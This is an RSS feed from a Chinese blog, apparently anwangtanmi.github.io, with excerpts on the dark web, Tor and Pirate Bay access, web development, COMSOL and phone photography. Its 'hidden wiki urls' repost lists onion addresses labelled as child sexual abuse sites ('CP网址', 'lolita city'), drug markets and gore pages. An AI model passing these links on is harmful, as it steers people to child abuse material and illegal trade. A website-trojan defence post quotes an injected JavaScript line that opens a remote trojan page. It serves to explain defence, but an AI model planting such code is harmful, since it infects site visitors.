Web。从概念来讲，暗网是指需要通过特殊软件、特殊授权、或对电脑做特殊设置才能连上的网络；深网的概念是指互联网上那些不能被标准搜索引擎索引的非表面网络内容。简单来说，暗网是深网的一个子集。&#xA;一图看懂互联网、深网与暗网&#xA;对暗网有过了解的人应该都听过类似的表述：在网络世界也有着一套冰山理论。即我们平时能看到的网络（或者说互联网）只占整个网络中的4%-5%，也可以称之为”明网”，超过整个数据量的95%都隐藏在冰山之下，在冰山之下，存在着很多见不得光的东西，包括暴力、犯罪……简单来看，上面的表述似乎没有问题，事实上这种表述存在严重的逻辑漏洞和偷换概念，容易给人造成误导。&#xA;登入暗网的实现方式 强大的需求使暗网长盛&#xA;对于暗网，我们不但要知其然，还要知其所以然。为什么会存在暗网呢，更确切地说，暗网的实现逻辑和存在逻辑分别是什么？暗网也被称作”隐藏的服务器”，其域名数量达到表层网络的400-500倍。像纸牌屋中形容的那样：”96%的互联网数据无法通过标准搜索引擎访问，虽然其中的大部分属于无用信息，但那上面有一切东西，儿童贩卖、比特币洗钱、致幻剂、大麻、赏金黑客……”&#xA;暗网教学视频&#xA;但那些，只是暗网中的很小一部分。（注释：96%无法通过搜索引擎搜索到的是深网，并非暗网。）从暗网的定义中可以看到，暗网是需要通过特殊软件、授权才能连接的网络。也就是说，从实现逻辑上来讲，暗网不是随随便便就能进入的，暗网链接需要一定的契约、技术手段和资金支付。&#xA;Tor服务&#xA;虽然Tor 项目联合创始人 Roger Dingledine 指出，大部分 Tor 用户访问 Tor 隐藏服务，只是想隐藏身份，并对出席 DEF CON 会议的与会者表示，暗网没有真的存在，它们只是少许网页。&#xA;暗网中Tor结构（图片来自freebuf）&#xA;但是，这不能否定一个反向的逻辑，即大多数登入暗网的人都是通过Tor洋葱网络实现的（当然也有部分通过I2P隐形互联网项目连接）。Tor，这个由美国情报局发明的工具，戏谑性的成为如今大多数人进入暗网的首选方式。&#xA;强大的需求使暗网长盛：利益 从技术上来讲，登录暗网需要进行一些预设，也需要VPN。而在整个网络生态上来讲，暗网的存在也似乎是顺理成章的。&#xA;silk road丝绸之路&#xA;以2013年被曝光的”silk road丝绸之路”为例，在这个网站上，可以买到毒品、强制、性奴、儿童色情，甚至是人体器官。用网站创始人乌布利希的话来说”我要创建一个经济仿真体，让人们体验：生活在一个没有系统化权利使用的世界里是什么样子的。”不受束缚的欲望和资本积累需求，成为暗网存在逻辑中最重要的因素，也成为暗网长盛的关键。&#xA;暗网创始人罗斯·威廉姆斯·乌布利希&#xA;silk road网站诞生于2011年，由曾经的天才好学生罗斯·威廉姆斯·乌布利希自学编程创建。网站需要有Tor作为入口登录，利用比特币的区块链去中心化、无法追踪的特性，全站采用比特币交易。在这个不见光的网络中，购买非法物品时又都是光明正大的。利用这个黑暗版淘宝，silk road创始人从每笔交易中抽成8%-15%，在2011-2013短短两年中，实现了12亿美金的资本积累……&#xA;silk road之后 千万个暗网崛起（注：最下方绿色为丝绸之路）&#xA;暗网是整个网络中的一部分。对于silk road这种资金积累和生态模式，显然有人很受用。在2013年silk road倒下之后，千千万万的silk road，甚至是加强版silk road出现。另一方面来讲， 网络发展到现在，仅中国网民规模就已经达到6.68亿，全球的网民数量和联网设备、服务器数量之庞大，都是普通人难以想象的。服务器为我们提供了网互联世界中几乎所有的快速计算需求，而并不是所有服务器的数据都是公开的，这样暗网的存在就成为了一种必然。&#xA;辨别暗网上的那些真与假 暗网上的那些真与假&#xA;由于章莹颖案的触发，暗网再次成为一个热点话题，虽然很多你能搜到的暗网传说都是假的，准确的说是缺乏依据的（比如与外星人的道西战争）。但是不得不承认，在暗网上，你能购买非法物品：伪币、美国护照、海洛因、枪支等，能够肆意分享短片、发布极端思想博客，甚至洗钱。&#xA;传说中与外星人的道西战争&#xA;为了给大家一个具象化的直观感受， 笔者引用一个发生在日本的案例。在2007年8月25日，31岁的外派公司职员矶谷利惠在日本千种区遇害，尸体被丢弃在岐阜县瑞浪市的山林中。案发不足一日，警方接到一通自首电话，使得案件在24小时内破案。&#xA;矶谷利惠儿时与母亲合照&#xA;经调查发现，三名犯罪嫌疑人均处于无业游民状态，年龄分别为40岁、36岁和31岁（36岁神田司为《朝日新闻》推销员），三人相识不过一周的时间。而让他们相互建立犯罪同盟关系的，只是一个需要密码才能进入的匿名BBS，一个叫做”暗职介绍所”的暗网。这个网站藏在暗处，以名古屋为中心，网址是由乱码一样的字符组成，有效地避开了警方的监督，成为非法获利活动的据点。&#xA;八年后 神田司被判处死刑&#xA;在暗网中，类似的非法活动有很多。但是根据Terbium Labs的一项研究表明，暗网并没有我们想象的那么黑暗，大约55%的暗网内容是合法的。&#xA;当我们在谈论暗网时，是在谈论什么 你也曾游离在暗网的边缘？&#xA;什么是暗网？针对这个问题，在笔者采访的不同对象中得到了几种不太相同的答案。有人说，暗网是个可怕的存在，很多人因为上了暗网变得边缘化；有人说，暗网这个描述不够准确，暗网其实只是不在现在大家常见的互联网这个局域网中的网络；也有人说，暗网就是”丝绸之路”，是导致章莹颖遇害的重要通道，在暗网上，涉毒、洗钱、人口贩卖、涉黑等恐怖暗罪视频、图片比比皆是……</description>
    </item>
    <item>
      <title>微信小程序下拉刷新事件无效原因</title>
      <link>https://anwangtanmi.github.io/posts/bab5aa31597c222c9b87f90ad6a6d4fa/</link>
      <pubDate>Fri, 07 Dec 2018 10:25:01 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/bab5aa31597c222c9b87f90ad6a6d4fa/</guid>
      <description> 1.页面json文件中没有开启enablePullDownRefresh配置&#xA;2.请在真机调试中调试（开发工具下拉事件监听不到）&#xA;tip: q:有下拉页面移动效果，没有刷新加载动画&#xA;a:加载动画颜色跟背景色重叠，设置json文件”backgroundTextStyle”: “dark”&#xA;q:下拉后页面不返回顶部&#xA;a:没有调用结束下拉刷新动画方法&#xA;js文件&#xA;onPullDownRefresh: function () { console.log(&#39;下拉&#39;) wx.startPullDownRefresh() setTimeout(()=&amp;gt;{ wx.stopPullDownRefresh() },2000) } json文件&#xA;{ &#34;backgroundTextStyle&#34;: &#34;dark&#34;, &#34;enablePullDownRefresh&#34;: true } </description>
    </item>
    <item>
      <title>通过Tor浏览器访问deep web和dark web&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;&#43;ideal</title>
      <link>https://anwangtanmi.github.io/posts/bb6b2157d1a1d1ba36b9c052f0c73c91/</link>
      <pubDate>Fri, 09 Nov 2018 18:53:21 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/bb6b2157d1a1d1ba36b9c052f0c73c91/</guid>
      <description>1.打开网址http://www.theonionrouter.com/ 2.点击Download Tor进行下载 3.下载之后进行配置 .&#xA;4.是否使用代理，点击否，下一步 .&#xA;5.防火墙是否仅允许特定端口的互联网连接，点击否，下一步 .&#xA;6.互联网提供商（ISP）是否对Tor网络连接进行了封锁或审查？点击是，下一步 .&#xA;7.使用集成的网桥进行连接，传输类型为：fte，然后点击连接。 .&#xA;8.这样就连接成功了 .&#xA;9.打开一个后缀名为.onion的网站。 （以上就是我的方法，开车要小心，扶好方向盘！）&#xA;（现在我发现上面的方法已经失效，下次补充新的）</description>
    </item>
    <item>
      <title>深网—藏在冰山一角下的网络</title>
      <link>https://anwangtanmi.github.io/posts/6cc770b35f56c56011981e5253d266ab/</link>
      <pubDate>Tue, 30 Oct 2018 17:14:17 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/6cc770b35f56c56011981e5253d266ab/</guid>
      <description>藏在冰山一角下的网络 附：&#xA;Tor洋葱浏览器 我们日常所用到的全部网站，都可以通过谷歌、百度等搜索引擎来搜索，这样的网站我们称之为表层网站（Surface web）。这些网站的名称往往比较好记，不需要任何特殊的技术或工具，只用普通的浏览器就可以进入这些网站。&#xA;然而，有另外许多网站，它们是无法通过搜索引擎来搜索到的，只有通过特殊的工具和浏览器，你才能看到网站中的部分内容。这些网站被称为 深网（Deep web）。&#xA;在网络世界里，有96%的内容都是埋在这些深网之中的，而我们能看到表层网站，仅占全部网络世界的4%。&#xA;深网中的访问者，可以通过浏览器的加密和反追踪技术，完全匿名地发送加密信息，深网域名都是以 .onion 结尾，由于隐蔽性，又恰好符合了很多访问者的不可告人的目的。比如：&#xA;贩卖赃物、军火、走私品、毒品及违禁药品 窃取电子商务网站用户数据库后，对个人信用卡信息进行贩卖 制作及出售色情影片、暴力影片 洗钱，以及匿名转移资金 伪造身份证件、护照等 策划犯罪活动 在比特币（BitCoin）等不记名虚拟货币出现之后，暗网的交易活动变得更加简单：一切交易都可以通过虚拟货币转入匿名账户，而避免了从银行系统转账后被警方跟踪的风险。&#xA;而在深网中，这些与犯罪具有高度关联的网站，便被称为「 Dark web」，所以把Dark web称之为Deep web是错误的。&#xA;深网域名之所以以 .onion 结尾，是因为onion是洋葱的意思。大部分的Deep web使用匿名的Tor技术或使用类似的软件如I2P等。这类软件会加密网络流量并随机挑选位于世界各地的计算机传输数据，类似于剥洋葱，加密过的数据会在每次传输后“剥开”加密层。从理论上讲，哪怕是数据源到数据目的地都被控制，这种技术也完全可以避免窃听和审查。&#xA;一般而言，当用户使用Tor后，浏览的任何网站都不可能很轻易的看到用户真实的IP地址。但当一个网站也同样使用了Tor隐藏技术后，只有同样使用Tor技术的用户才能够访问。对与使用Tor技术的网站和用户，数据都要经过三次随机的跳转才能够“碰面”。&#xA;虽说网站的IP地址是隐藏的，然而却并不意味着这一切都是绝对的秘密。任何人使用Tor并知道网站的地址（通常以.onion结尾）都可以访问这些非法的在线市场。Deep web上的一些网站也有很多“高端服务”，也就组成了Dark web。而Dark web由于其隐蔽性很高，不通过技术手段是很难访问到的，其实Dark web展现的是网络中人性的阴暗面。&#xA;记住凝望深渊的同时，深渊也会凝望着你。</description>
    </item>
    <item>
      <title>进入海盗湾的正确姿势</title>
      <link>https://anwangtanmi.github.io/posts/63b75e3d1c7090b6d71f1f355162a4a7/</link>
      <pubDate>Wed, 19 Sep 2018 17:45:04 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/63b75e3d1c7090b6d71f1f355162a4a7/</guid>
      <description>由于海盗湾属于暗网网站，经常被和谐掉，并且上去寻找东西需要耐心等待，下面就来说说如何进入：&#xA;第一步：下载洋葱漏油器并安装&#xA;第二步：打开洋葱路由进行设置，并找到三个代理地址和端口，进入路由界面&#xA;第三步：安装翻译组件，并设置&#xA;第四步：打开暗网导航，找到海盗湾正确暗网地址（ps:还可以对洋葱路由安全设置以及匿名等进行设置）&#xA;第五步：进入海盗湾网站，进行资源下载&#xA;如有问题，或者想知道如何科学上网，联系博主，或者下方留言!!!!</description>
    </item>
    <item>
      <title>comsol LiveLink with matlab联合仿真入门及心得</title>
      <link>https://anwangtanmi.github.io/posts/280e92f964b8e888518aa05ffedcbd51/</link>
      <pubDate>Sun, 02 Sep 2018 20:56:48 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/280e92f964b8e888518aa05ffedcbd51/</guid>
      <description>版本：5.3a和2017b&#xA;comsol与matlab联合仿真的内容在LiveLink的介绍中用于MATLAB中讲的还比较清晰。如果在网上找不到文档可以在文件 – 帮助 – 文档最下面找到，同时COMSOL Multiphysics Programming参考手册这个文档是在COMSOL Multiphysics节点下面的，可以学习一下这种编程方式。&#xA;但是在matlab到comsol文件保存讲的有点模糊了，本来用的比较多的也是使用matlab处理重复的工作、数值计算、 使用随机函数绘制一些特殊的几何，调用函数等等真正用编程的形式来整个建模还是比较麻烦的。&#xA;1.点击COMSOL Multiphysics 5.3a with MATLAB桌面图标，第一次需要自己输入用户名和密码。&#xA;进入matlab之后会有如下图的显示：&#xA;2.点击comsol，在首选项 – 安全性勾选允许使用外部MATLAB函数;&#xA;3.点击主屏幕中的函数-matlab函数，函数名与后面输出的函数名相同即可;&#xA;4.点击文件-COMSOL Multiphysics Server-连接到服务器;&#xA;5.在MATLAB中中输入自己的函数，保存为.M文件，同时仿真文件也要保存在同一路径下面，但是这个保存的地方有点坑使用手册上写的如下：将文件保存在MATLAB下的用户文档文件夹中作为heatflux .M。将文件保存在此位置（/ Documents / MATLAB）可确保MATLAB在COMSOL调用该函数进行评估时找到该函数。我根本没有找到这个文件，把文件存放在其他地方一直报错。后来将文件存放在C盘下面才不报错了，调用外部函数一切正常。</description>
    </item>
    <item>
      <title>【转载】hidden wiki urls</title>
      <link>https://anwangtanmi.github.io/posts/0a4703fefaca763ceec8d119a9271501/</link>
      <pubDate>Fri, 31 Aug 2018 15:52:58 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/0a4703fefaca763ceec8d119a9271501/</guid>
      <description>暗网网址集合 转自 https://blog.csdn.net/qq_36561697/article/details/82193063&#xA;http://newmap.norsecorp.com/ norse attack map&#xA;http://22u75kqyl666joi2.onion/ 暗网中文论坛&#xA;http://reloadedudjtjvxr.onion/road.php 丝绸之路3.0&#xA;http://www.normalpornfornormalpeople.com/ normal人体试验血腥网址（需要账号）&#xA;http://prnstmrpfkgkaw5v.onion/ 小福利&#xA;http://iuhcjx6fpeafstuu.onion/ Scream bitch！&#xA;http://6soqvgf7mrjc7w3j.onion/bbs/index.php 114中文论坛&#xA;http://6soqvgf7mrjc7w3j.onion/chat/blab73/index.php 114聊天室 （马克斯AKeD jasonlee1573）&#xA;http://xmi6ngumdv6ohjbm.onion/ 天堂庄园CP网址&#xA;http://smok6do2tvv6ekv2.onion/ SMOKEBLES&#xA;http://kpvz7kpmcmne52qf.onion/wiki/index.php/Main_Page uncensore hidden wiki&#xA;http://bdpuqvsqmphctrcs.onion/ Anarchy网址导航&#xA;http://xkow4dnkw7cusncz.onion/ 暗网中文论坛2&#xA;http://rfwtogljhrrzxyrl.onion/ lolita city&#xA;http://mail2tor2zyjdctd.onion/ Mail2tor邮箱&#xA;http://underdj5ziov3ic7.onion/category/CHINESE 中文网址导航&#xA;http://eg63fcmp7l7t4vzj.onion/ 秘密树洞&#xA;http://opea6td2pg66qouf.onion/ torbay论坛中文&#xA;http://wiki5kauuihowqi5.onion/ – Onion Wiki&#xA;http://newpdsuslmzqazvr.onion/ drug&#xA;http://postits4tga4cqts.onion/ matrix留言板&#xA;http://kbhpodhnfxl3clb4.onion/ tor搜索引擎&#xA;http://loupsycedyglgamf.onion/PSYC/?room=EDN 聊天室&#xA;http://www.glowing-bear.org/ glowing bear聊天室&#xA;http://b4d3igwmoo5355ur.onion/greatc/login.php 中文聊天室 挂了&#xA;http://32pbf32xi6ccm63z.onion/blog/temas/living-room/ 成人porn直播间&#xA;http://www.onion.link/ onion city搜索引擎</description>
    </item>
    <item>
      <title>建站教程（三）：在Ubuntu上如何基于Nginx部署WordPress</title>
      <link>https://anwangtanmi.github.io/posts/78d881d98d9e237f55cedcdaed310e48/</link>
      <pubDate>Mon, 13 Aug 2018 14:18:12 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/78d881d98d9e237f55cedcdaed310e48/</guid>
      <description>本教程介绍如何在Ubuntu系统下基于Nginx部署搭建WordPress。包括下载WordPress，创建WordPress操作的MySQL数据库和用户，配置WordPress，在Nginx中配置WordPress以及安装WordPress。&#xA;下载WordPress 直接通过wget命令去它官网下载最新的版本：&#xA;wget http://wordpress.org/latest.tar.gz 解压：&#xA;tar -xzvf latest.tar.gz 创建WordPress操作的数据库和用户 用在建站教程（二）：Ubuntu上如何配置Nginx+MySQL+PHP7（LNMP）中创建MySQL时设置的root密码登录MySQL：&#xA;mysql -u root -p 创建数据库：&#xA;CREATE DATABASE wordpress; 创建用户：&#xA;CREATE USER wordpress@localhost; 设置密码：&#xA;SET PASSWORD FOR wordpress@localhost=PASSWORD(&#34;your password&#34;); 配置权限：&#xA;GRANT ALL PRIVILEGES ON wordpress.* TO wordpress@localhost IDENTIFIED BY &#39;your password&#39;; 刷新权限配置：&#xA;FLUSH PRIVILEGES; 退出MySQL：&#xA;QUIT; 配置WordPress 重命名示例文件wp-config（此处的路径/root/wordpress对应你自己的存放路径）：&#xA;mv /root/wordpress/wp-config-sample.php /root/wordpress/wp-config.php 修改配置文件内容：&#xA;vi /root/wordpress/wp-config.php 修改的内容包括DB_NAME，DB_USER，DB_PASSWORD以及下面的唯一key，其中前三个是在第二步自己设置的内容，唯一key可以直接去它提供的网站上拷贝，修改后的文件如下所示：&#xA;配置Nginx 根据建站教程（二）：Ubuntu上如何配置Nginx+MySQL+PHP7（LNMP），Nginx的root路径是/var/www/html，所以讲wordpress里面的内容拷贝到此路径下：&#xA;cp -r /root/wordpress/* /var/www/html 修改权限（这些文件都是root的，而Nginx默认是www-data用户来运行，所以没有权限写入root的文件）：&#xA;chown -R www-data:www-data /var/www/html 如果按照第二步配置了，那么default的配置文件内容不需要修改了，如果没有修改，请戳-&amp;gt; 建站教程（二）：Ubuntu上如何配置Nginx+MySQL+PHP7（LNMP）&#xA;重启Nginx：</description>
    </item>
    <item>
      <title>网站被挂马的处理办法以及预防措施</title>
      <link>https://anwangtanmi.github.io/posts/96eb843e0b900fcc38244d9d4d876186/</link>
      <pubDate>Thu, 09 Aug 2018 10:00:08 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/96eb843e0b900fcc38244d9d4d876186/</guid>
      <description> 喜欢的朋友可以关注下。 相信很多的朋友都有遇见过，通过百度快照访问一个网站被跳转到另一个目标网站。&#xA;这就说明网站被劫持了，那么黑客为什么要劫持这些网站呢？黑客一般选择什么样的网站下手？下面我们就一起分析一下。&#xA;首先黑客一般都会选择信息类网站，购物网站等，因为这些网站的IP高，劫持这些网站能达到他们的引流目的。我们这来做一个假设，如果有100个用户准备访问A网站，但都被劫持到B网站了，那么只是会有10%的用户会对B网站产生兴趣，那么他们的引流目的就达到了，对于A网站而言，他们就损失了部分用户，这是他们不愿看见的，所以他们是很痛恨黑客的。&#xA;当然被黑客劫持的网站往往他们都会引流到一些菠菜类的网站，相信很多人看了都会有去搏一搏的心态，一玩不要紧，如果你的控制能力很差的话，那么你就深深的陷入了，这是一个吃人不吐骨头的，这里还是温馨的提醒大家 不要有赌博的心态，不说题外话了，下面我们就一起来看看所谓的木马。&#xA;首先，我们需要弄清楚黑客一般是通过哪些渠道来给网站挂木马的。&#xA;1.通过漏洞（例如一个软件的漏里，给你的服务器上传一些命令脚本）&#xA;2.破解你的服务器账号密码，创建子用户，任意上传脚本文件&#xA;这里我来例举一些常见的木马脚本命令：&#xA;现在最多见的JS挂马方法有两种，一种是直接将JavaScript脚本代码写在网页中，当访问者在浏览网页时，恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口，隐藏地运行。&#xA;这种方法使用的关键代码如下：&#xA;window.open(&#34;http://www.mahaixiang.cn/木马.html&#34;,&#34;&#34;,&#34;toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1&#34;); 这种代码往往很长，很容易被安全工程师发现，而且没有经验的黑客也喜欢将“width”和“height”参数设为“0”，但是设置为0后，可能会出现恶意代码不运行的情况。&#xA;另外一种JS挂马方式是，黑客先将挂马脚本代码“document.write(‘＜Iframe src=”网页木马地址” &amp;gt; 或者&#xA;document.write(&#34;&#34;) document.write(&#34;&#34;) document.write(&#34;&#34;) 还有这种方式&#xA;这个图大家都能看明白，这就黑客的攻击流程。&#xA;其次，当我们发现自己的网站被挂马了，改如何来做呢？&#xA;当你的网站文件不是很多时，那么你可以一个一个来查看，看见陌生的代码，这时你就需要注意了，有可能就是木马了。&#xA;那么如果你的文件有成千上万个，自己一个一个的看那不是要看到眼花，这里我给大家推荐一款免费的查找工具护卫神，下面我把工具分享给大家需要可以下载&#xA;https://download.csdn.net/download/dsn727455218/10592371&#xA;这里面，是有三款软件，其一就是木马查找工具，已经防篡改工具，及防攻击的&#xA;上面介绍的是用工具来防止被挂马，那么我们通过代码来如何实现呢，一起来看看&#xA;防第一种JS挂马方式，不方便，用得非常少，而第二种JS挂马方式才是当前主流的，所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本，代码如下：&#xA;iframe{mdy1:expression(this.src=&#39;about:blank&#39;,this.outerHTML=&#39;&#39;);} script{mzm2:expression((this.src.toLowerCase().indexOf(&#39;http&#39;)==0)?document.write(&#39;木马被成功隔离!&#39;):&#39;&#39;);} 不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。&#xA;所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码，这段代码会让异地外域的JS文件在使用document.write()时，被 document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完，只有部分被强制输出了，Writer后面的内容再不会被写入访 问者的电脑中，从而起到防范JS脚本挂马的作用。&#xA;让JS木马的进程迅速中止&#xA;在 之间加入如下代码: 屏蔽script和iframe&#xA;单屏蔽script&#xA;通过添加一个代码来防止被被人挂马。&#xA;下面我就给大家分享一下如何做好服务器安全工作：&#xA;1.对项目文件增加读写权限&#xA;2.服务器的密码不要用什么root，admin，123456这些很容易被试出来的，相信很多人都是用这个密码吧。&#xA;3.服务器限制IP登录，一般登录服务器基本上都是那么两个人可以设置白名单，其他的一律禁止登录&#xA;4.不定期的维护等&#xA;5.当然如果你们公司有钱，也可买付费产品，他们能防止的很多，我看阿里云的安骑士专业版一年的费用都是好几千，还不算其他的一些产品，相信很多的小公司，都不愿出这个钱，所以大家还是努力做好自己的防护措施。&#xA;如有需要可以加我Q群【308742428】大家一起讨论技术。&#xA;后面会不定时为大家更新文章，敬请期待。&#xA;喜欢的朋友可以关注下。 如果对你有帮助，请打赏一下谢谢。 </description>
    </item>
    <item>
      <title>Spring Boot实战——公共页</title>
      <link>https://anwangtanmi.github.io/posts/724de2c5510205bc5ea4787cd17bc845/</link>
      <pubDate>Tue, 07 Aug 2018 10:58:01 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/724de2c5510205bc5ea4787cd17bc845/</guid>
      <description>进行web开发的时候会经常遇到某些页面，它们的页面中某些地方是一样的，也就是说，这部分地方是公共的，每个页面的html代码都是一样的，这样的页面我们称为公共页。而本次实战中，我们要对公共页进行操作，简化公共页的繁杂性。&#xA;导言如下：&#xA;（0）预准备&#xA;（1）抽取公共页&#xA;（2）点击高亮&#xA;（0）预准备 准备工作我曾经在Spring Boot实战——登录页中说过，其实步骤差不多，就是首先导入资源文件，我这次导入了两个公共页，并对其html代码进行部分修改，一个设置为主页（dashboard.html），另一个设置为副页（list.html）。项目目录结构如下：&#xA;其中我将公共部分放入了bar.html，这个我稍后会说。&#xA;除此之外，项目还要导入thymeleaf的依赖，导入bootstrap 的依赖，在html代码中加入thymeleaf的语法提示，这些我在登录页的实战中都有说，大家可以去看看。&#xA;下面展示两个html页面的公共部分的代码，核心部分代码因功能不同而做自行修改（*单纯代码是不会有页面渲染，还要加入css，js，图片才行）：&#xA;Company name Sign out 主页 (current) 员工管理 而完整代码运行效果如下：&#xA;dashboard.html:&#xA;list.html:&#xA;这时候我们准备就完成了，我们首先要做的就是页面可以登录，这时候我们需要编辑controller，而编辑之前我们需要对旁边的主页和员工管理页面进行部分修改：&#xA;而我们观察html中有两段是有关两个按钮的a标签，a标签中有href进行链接（先dashboard.html再list.html）：&#xA;我们使用thymeleaf进行修改：&#xA;这时候我们编辑controller：&#xA;@Controller public class MyController { //dashboard.html作为主页面 @RequestMapping({&#34;/&#34;,&#34;/dashboard&#34;}) public String dashboard(){ return &#34;dashboard&#34;; } //通过按钮“员工管理”跳转，通过get请求获取“/emp” @GetMapping(&#34;/emp&#34;) public String dashboardtolist(){ //返回的是emp目录下的list.html //而thymeleaf默认拼串，所以前面静态资源文件夹不用存在 return &#34;emp/list&#34;; } //通过按钮“主页”跳转，通过get请求获取“/dashboard” @GetMapping(&#34;/dashboard&#34;) public String backdashboard(){ return &#34;dashboard&#34;; } } （1）公共页抽取 抽取公共部分我们首先需要知道公共部分是那些，所以我们需要在浏览器中打开页面通过开发者工具（F12打开），使用开发者工具观察公共部分是哪些：&#xA;找到公共部分，及它们对应的代码，这时候在IDEA中对公共部分抽取出来放在新建的一个html文件（bar.html）中&#xA;这时候我们就需要使用的thymeleaf中对公共部分的操作了：&#xA;（1）抽取公共片段 （将公共部分抽取出来）&#xA;公共部分代码 （2）引入公共片段 （在原先html代码中插入）&#xA;其中：&#xA;~{templatename::selector}：模板名::选择器</description>
    </item>
    <item>
      <title>手机摄影技巧总结——永远拍出美美的照片</title>
      <link>https://anwangtanmi.github.io/posts/b3c129753e1bbcf745d382a69d03497a/</link>
      <pubDate>Fri, 27 Jul 2018 17:46:50 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/b3c129753e1bbcf745d382a69d03497a/</guid>
      <description>Chapter 1手机常识—以华为p10为例&#xA;1.1对焦&#xA;如果在拍照时画面中的主体模糊，原因绝大多数是由于没有准确选择对焦点位置，对焦不准确。还有一种情况是手机距离主体太近，超出了自动对焦的范围，此时需要重新调整手机和主体的距离。&#xA;在华为p10中有三种对焦模式，即AF-C,AF-S和MF。其中AF-S代表单次自动对焦的意思，可以用于拍摄静止的物体；AF-C代表连续自动对焦，可以用于拍摄移动的物体；而MF代表手动对焦。&#xA;1.2 测光&#xA;手机在记录画面瞬间时，其内部还会对画面进行测光，如果我们很随意的去拍摄而不考虑手机测光，可能会导致画面过曝或欠曝的现象发生，导致画面过暗或过亮，从而失去了画面细节。&#xA;华为p10有三种测光模式:矩阵测光，中央重点测光，点测光。&#xA;矩阵测光:对画面中整体区域的光线强弱及色彩等情况进行侦测分析，之后自动得出一个曝光值，这种测光模式适合场景中光线，色彩等反差不大的情况下使用。&#xA;中央重点测光:是指将测光的重点位置放在画面的中心约占75%的区域，在光线色彩反差较大的情况下，这种测光模式比矩阵测光更加容易控制效果。&#xA;点测光:是指仅对画面中较小区域(约占整体面积的1.5% ~3%)进行测光，测光点所侦测的画面是非常小的，但所测到的结果是非常精准的。这种测光模式适用于场景光线反差很大，或者是主题在画面中所占比例很小的时候使用。&#xA;1.3 曝光补偿(EV)&#xA;如果拍摄的画面比较亮或者暗，我们可以提升曝光补偿增加画面亮度，或者降低曝光补偿减少画面亮度。需要注意的是，提升或降低曝光补偿要适度，防止画面细节丢失。但是在华为p10中，好像小太阳已经没有了。&#xA;1.4 构图线辅助取景构图&#xA;使用构图线拍摄照片，可以更好的掌握画面的平衡，更加容易的将主体放置在画面黄金分割点位置。想要使用三分法构图，水平线构图(如拍摄大海时)，黄金分割法，井字形构图等构图方法时，利用构图线辅助我们构图拍摄是最好的选择。&#xA;1.5 使用HDR功能展现画面更多细节&#xA;在摄影创作时，如果现场光线的明暗差异比较大，会影响到主体亮度细节或是暗部细节的表现，如果想要让画面既保留亮部细节也保留暗部细节，可以打开手机拍摄功能中的HDR功能。&#xA;1.6 闪光灯的正确使用&#xA;如果我们想要在光线不好的条件下或者是夜间拍摄，打开手机中的闪光灯进行不光，可以使画面得到明显改善，拍摄出清晰地主体。&#xA;需要注意的是，开启手机的闪光灯拍摄要控制好手机与主体之间的距离。距离太近容易造成曝光过度；距离太远，又起不到补光效果。&#xA;但是并不是所有的弱光环境都适合开启闪光灯。开启闪光灯的确可以将主体清晰地呈现在画面里，但闪光灯只会将离镜头近的被摄体照亮，背景则会被压暗，漆黑一片，如果我们需要将背景表现出来，则不适合使用闪光灯。&#xA;Chapter2 让拍摄主体保持清晰&#xA;2.1 保持手机稳定很重要&#xA;首先，如果我们在行走过程中发现想要拍摄的景物，停下脚步，之后再去拍摄，不要边走边拍摄，否则很容易造成画面模糊；&#xA;其次，我们拿手机拍照的姿势一定要正确，如果姿势不正确，手按快门也会发生抖动，从而影响画质。&#xA;如果对拍摄时的稳定性要求很高，则需要为手机安装上三脚架。&#xA;2.2 注意光线对画面的影响&#xA;在逆光拍摄时，主体面对镜头的一面表现的很暗，主体细节得不到清晰呈现甚至完全丢失，从而形成剪影效果。当然，有时候我们也会特意追求剪影效果，但当想要主体清晰成像时，逆光剪影便无法呈现主题的细节信息。&#xA;在逆光拍摄，我们可以将测光点对准主体测光，比如在逆光环境下拍摄人像照片，可以对人脸进行测光，然后再拍摄。这种方法的弊端是，人物面部等细节得到准确曝光，人物背景则会呈现过曝现象。比如游玩时，想要在背景风光中拍摄人物，那么风景的细节会丢失。&#xA;当然，如果让主体处于顺光或是测光的位置在进行拍摄，这样便可以得到主体和背景都清晰的画面。&#xA;2.2 曝光准确&#xA;拍摄时，我们要遵循“宁可欠曝也不过曝”的原则，因为欠曝的画面可以通过后期将主体细节调整过来，而过曝画面则很难恢复主体细节。【欠曝会将暗部细节修复出来，而过曝画面则是损失了细节】&#xA;2.3 避免画面杂乱&#xA;1.靠近拍摄；&#xA;2.改变拍摄角度，避开杂乱物体；&#xA;3.利用明暗对比，将杂乱景物隐藏起来；&#xA;4.通过后期处理将杂乱景物裁剪掉。&#xA;Chapter 3 构图&#xA;由于在使用手机进行拍摄时，手机的光圈，快门等影响曝光的因素几乎都是手机自行控制的，所以留给我们最大的创作余地就是构图。构图可以增强画面的美感，可以起到优化背景的作用，还可以使主体更加突出。&#xA;3.1 不同画幅带来不同效果&#xA;常见画幅类型有:横画幅，竖画幅和方画幅。在使用手机拍摄时，要考虑好使用何种画幅，因为不同画幅会给画面带来不同效果。&#xA;横画幅(适合宽广的场景) 把手机横过来进行取景构图，会得到一张横向的长方形照片，这就是横画幅照片，横画幅的照片符合我们的视觉习惯，这样就会使画面看上去更加自然，能够给人以平静宽广的视觉感受。&#xA;另外，在拍摄横画幅时，我们需要注意画面的水平，以保证构图的严谨性。&#xA;竖画幅(适合人物，建筑等场景) 方画幅 